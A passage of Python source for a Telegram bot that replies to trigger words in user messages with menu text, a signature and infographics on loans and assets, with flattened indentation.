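        # part of the original flow):
        # self.updater.idle()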
def send_textfile(self, textfile, update, context):
"""
        Takes a text file path and sends its contents as a message to the user.
"""
with open(textfile, 'r') as file:
MSG = file.read()
context.bot.send_message(chat_id=update.message.chat_id, text=MSG)
def send_str(self, msg_str, update, context):
"""
        Takes a string and sends it as a message to the user.
"""
MSG = msg_str
context.bot.send_message(chat_id=update.message.chat_id, text=MSG)
def show_menu(self, update, context):
"""
Shows the menu with current items.
"""
msg_file = 'menu_msg.txt'
self.send_textfile(msg_file, update, context)
def send_signature(self, update, context):
"""
Sends out a signature message specified in a text file.
"""
msg_file = 'signature_msg.txt'
self.send_textfile(msg_file, update, context)
    def send_pic(self, pic_file, update, context, caption=None):
"""
Sends picture as specified in pic_file.
"""
# Send image
with open(pic_file, 'rb') as img:
# Sends the picture
context.bot.send_photo(
chat_id=update.message.chat_id,
photo=img,
caption=caption
)
        # Brief pause to throttle consecutive sends (crude protection against
        # calling the Telegram API too frequently)
time.sleep(0.3)
def show_loan_stats(self, update, context):
"""
Sends out a preliminary message plus the loan stats infographic.
"""
# Send preliminary message
msg = 'Some message...'
self.send_str(msg, update, context)
# Send pic
        self.send_pic('loans.png', update, context)
def show_il(self, update, context):
"""
Sends out a preliminary message plus the IL infographic.
"""
# Send preliminary message
msg = 'Some other message...'
self.send_str(msg, update, context)
# Send pic
        self.send_pic('il.png', update, context)
def show_assets(self, update, context):
"""
        Sends out a preliminary message plus the assets infographic.
"""
# Send preliminary message
msg = 'Some other message...'
self.send_str(msg, update, context)
# Send pic
        self.send_pic('assets.png', update, context)
def handle_text_messages(self, update, context):
"""
Encapsulates all logic of the bot to conditionally reply with content
based on trigger words.
"""
# Split user input into single words
words = set(update.message.text.lower().split())
logging.debug(f'Received message: {update.message.text}')
        # For debugging: log users that received something from the bot
        chat_user_client = update.message.from_user.username
        if chat_user_client is None:
            chat_user_client = update.message.chat_id
# Possibility: received command from menu_trigger
        for trigger in self.menu_trigger:
            for word in words:
                if word.startswith(trigger):
self.show_menu(update, context)
logging.info(f'{chat_user_client} checked out the menu!')
return
# Possibility: received command from loan_stats_trigger
        for trigger in self.loan_stats_trigger:
            for word in words:
                if word.startswith(trigger):
#self.send_textfile('under_construction.txt', update, context)
self.show_loan_stats(update, context)
self.send_signature(update, context)
logging.info(f'{chat_user_client} got loan stats!')
return
# Possibility: received command from il_trigger
        for trigger in self.il_trigger:
            for word in words:
                if word.startswith(trigger):
self.send_textfile('under_construction.txt', update, context)
#self.show_il(update, context)
#self.send_signature(update, context)
logging.info(f'{chat_user_client} tried to get IL info!')
return
# Possibility: received command from assets_trigger
        for trigger in self.assets_trigger:
            for word in words:
                if word.startswith(trigger):
                    self.send_textfile('under_construction.txt', update, context)
                    #self.show_assets(update, context)
#self.send_signature(update, context)
logging.info(f'{chat_user_client} tried to get asset info!')
return
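# Illustrative walk-through (hypothetical message): the text "show me /loans"
# is split into {'show', 'me', '/loans'}; '/loans' starts with the '/loans'
# trigger, so show_loan_stats() and send_signature() are called and the
# handler returns without checking the remaining trigger lists.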
def main():
"""
Entry point of the script. If run directly, instantiates the
MerchBot class and fires it up!
"""
merch_bot = MerchBot()
merch_bot.run_bot()
# If the script is run directly, fires the main procedure
if __name__ == "__main__":
main()
|